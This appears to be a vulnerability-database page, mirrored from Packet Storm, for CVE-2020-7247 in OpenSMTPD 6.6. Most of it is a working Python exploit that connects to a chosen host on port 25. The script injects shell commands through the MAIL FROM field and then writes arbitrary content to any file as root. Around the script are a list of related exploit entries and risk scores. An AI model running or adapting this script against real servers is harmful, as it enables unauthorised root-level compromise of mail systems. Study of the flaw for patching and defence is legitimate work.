OpenBSD OpenSMTPD 6.6 Remote Code Execution

🗓️ 06 Apr 2021 00:00:00Reported by Tobias MarcottoType

packetstorm🔗 packetstormsecurity.com👁 509 Views

OpenBSD OpenSMTPD 6.6 Remote Code Execution Vulnerabilit

Reporter	Title	Published	Views	Family All 72
GithubExploit	Exploit for CVE-2002-0526	12 Mar 202611:02	–	githubexploit
GithubExploit	Exploit for Improper Handling of Exceptional Conditions in Openbsd Opensmtpd	19 Jun 202107:34	–	githubexploit
GithubExploit	Exploit for Improper Handling of Exceptional Conditions in Openbsd Opensmtpd	17 Feb 202003:28	–	githubexploit
GithubExploit	Exploit for Improper Handling of Exceptional Conditions in Openbsd Opensmtpd	13 Feb 202106:57	–	githubexploit
GithubExploit	Exploit for Improper Handling of Exceptional Conditions in Openbsd Opensmtpd	30 Jan 202019:29	–	githubexploit
GithubExploit	Exploit for Improper Handling of Exceptional Conditions in Openbsd Opensmtpd	18 Feb 202010:52	–	githubexploit
FreeBSD	OpenSMTPd -- critical LPE / RCE vulnerability	28 Jan 202000:00	–	freebsd
0day.today	OpenBSD OpenSMTPD Privilege Escalation / Code Execution Vulnerabilities	29 Jan 202000:00	–	zdt
0day.today	OpenSMTPD 6.6.2 - Remote Code Execution Exploit	30 Jan 202000:00	–	zdt
0day.today	OpenSMTPD - MAIL FROM Remote Code Execution Exploit	10 Feb 202000:00	–	zdt

`# Exploit Title: OpenBSD OpenSMTPD Remote Code Execution Vulnerability  
# Date: 05/04/2021  
# Exploit Author: Tobias Marcotto  
# Tested on: Kali Linux x64  
# Version: 6.6  
# Description: smtp_mailaddr in smtp_session.c in OpenSMTPD 6.6, as used in OpenBSD 6.6 and other products, allows remote attackers to execute arbitrary commands as root via a crafted SMTP session, as demonstrated by shell metacharacters in a MAIL FROM field. This affects the "uncommented" default configuration. The issue exists because of an incorrect return value upon failure of input validation.  
# CVE : CVE-2020-7247  
  
  
*********************************************************************************************************  
  
  
import socket, time  
import sys  
  
HOST = input("what is the ip address of the host?: ")   
PORT = 25 # The same port as used by the server  
s = None  
  
writeto = input("Which file do you want to write to?: ")#raw inputen  
writewhat = input("What do you want to write to the file?: ")  
payload = b"""\r\n  
#0\r\n  
#1\r\n  
#2\r\n  
#3\r\n  
#4\r\n  
#5\r\n  
#6\r\n  
#7\r\n  
#8\r\n  
#9\r\n  
#a\r\n  
#b\r\n   
#c\r\n  
#d\r\n  
echo '"""+writewhat.encode()+b"""' > """+writeto.encode()+b"""  
.  
"""  
  
for res in socket.getaddrinfo(HOST, PORT, socket.AF_UNSPEC, socket.SOCK_STREAM):  
af, socktype, proto, canonname, sa = res  
try:  
s = socket.socket(af, socktype, proto)  
except OSError as msg:  
s = None  
continue  
try:  
s.connect(sa)  
except OSError as msg:  
s.close()  
s = None  
continue  
break  
if s is None:  
print('could not open socket')  
sys.exit(1)  
with s:  
data = s.recv(1024)  
print('Received', repr(data))  
time.sleep(1)  
print('sending')  
s.send(b"helo test.com\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"MAIL FROM:<;for i in 0 1 2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>\r\n")  
time.sleep(1)  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"RCPT TO:<root>\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"DATA\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(payload)  
data = s.recv(1024)  
print('Received', repr(data))  
s.send(b"QUIT\r\n")  
data = s.recv(1024)  
print('Received', repr(data))  
print("done")  
s.close()  
`

06 Apr 2021 00:00Current

0.2Low risk

Vulners AI Score0.2

EPSS0.94108